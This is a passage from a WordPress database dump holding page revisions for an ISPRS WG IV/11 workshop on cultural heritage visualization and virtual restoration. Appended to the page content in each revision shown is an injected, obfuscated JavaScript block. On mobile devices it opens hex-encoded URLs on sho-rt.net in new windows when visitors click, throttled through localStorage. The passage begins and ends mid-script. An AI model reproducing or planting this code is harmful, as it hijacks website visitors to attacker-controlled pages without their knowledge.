)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Cultural Heritage Visualization and Virtual Restoration','','inherit','closed','closed','','3897-revision-v1','','','2023-03-01 22:47:18','2023-03-01 22:47:18','',3897,'https://gsw2023.com/?p=3901',0,'revision','',0),
(3902,1,'2023-03-01 22:47:42','2023-03-01 22:47:42','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3900\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Cultural Heritage Visualization and Virtual Restoration</strong></h4>\n<h4 style=\"text-align: center;\"><strong>Workshop of ISPRS WG IV/11</strong></h4>\n<p class=\"1\" style=\"line-height: 150%;\">Nowadays GIS-based technologies play an important role in the protection of cultural heritage, which integrates recording, valuing, surveying, monitoring, simulating and early warning applications into 4D information to better analyze the spatial, material and value conservation of cultural heritage. By promoting the interpretation of heritage using spatio-temporal information management and visualization, the digital workflow is able to constantly support social conservation of cultural heritage.</p>\n<p class=\"1\" style=\"line-height: 150%;\">This workshop provides a platform to discuss digital practices in the use of cultural heritage protection and management. It will gather people from different disciplines and professions including loT, big data, BIM/CIM, AR/VR/MR, AI, H-BIM and digital twins, computer-aided heritage information management and visualization applications, in order to enhance multidisciplinary experts and public engagement in cultural heritage conservation.</p>\n<!-- /wp:paragraph -->\n<p>&nbsp;</p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Cultural Heritage Visualization and Virtual Restoration','','inherit','closed','closed','','3897-revision-v1','','','2023-03-01 22:47:42','2023-03-01 22:47:42','',3897,'https://gsw2023.com/?p=3902',0,'revision','',0),
(3903,1,'2023-03-01 22:48:13','2023-03-01 22:48:13','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3900\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Cultural Heritage Visualization and Virtual Restoration</strong></h4>\n<h4 style=\"text-align: center;\"><strong>Workshop of ISPRS WG IV/11</strong></h4>\n<p class=\"1\" style=\"line-height: 150%;\">Nowadays GIS-based technologies play an important role in the protection of cultural heritage, which integrates recording, valuing, surveying, monitoring, simulating and early warning applications into 4D information to better analyze the spatial, material and value conservation of cultural heritage. By promoting the interpretation of heritage using spatio-temporal information management and visualization, the digital workflow is able to constantly support social conservation of cultural heritage.</p>\n<p class=\"1\" style=\"line-height: 150%;\">This workshop provides a platform to discuss digital practices in the use of cultural heritage protection and management. It will gather people from different disciplines and professions including loT, big data, BIM/CIM, AR/VR/MR, AI, H-BIM and digital twins, computer-aided heritage information management and visualization applications, in order to enhance multidisciplinary experts and public engagement in cultural heritage conservation.</p>\n<!-- /wp:paragraph -->\n<p>&nbsp;</p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 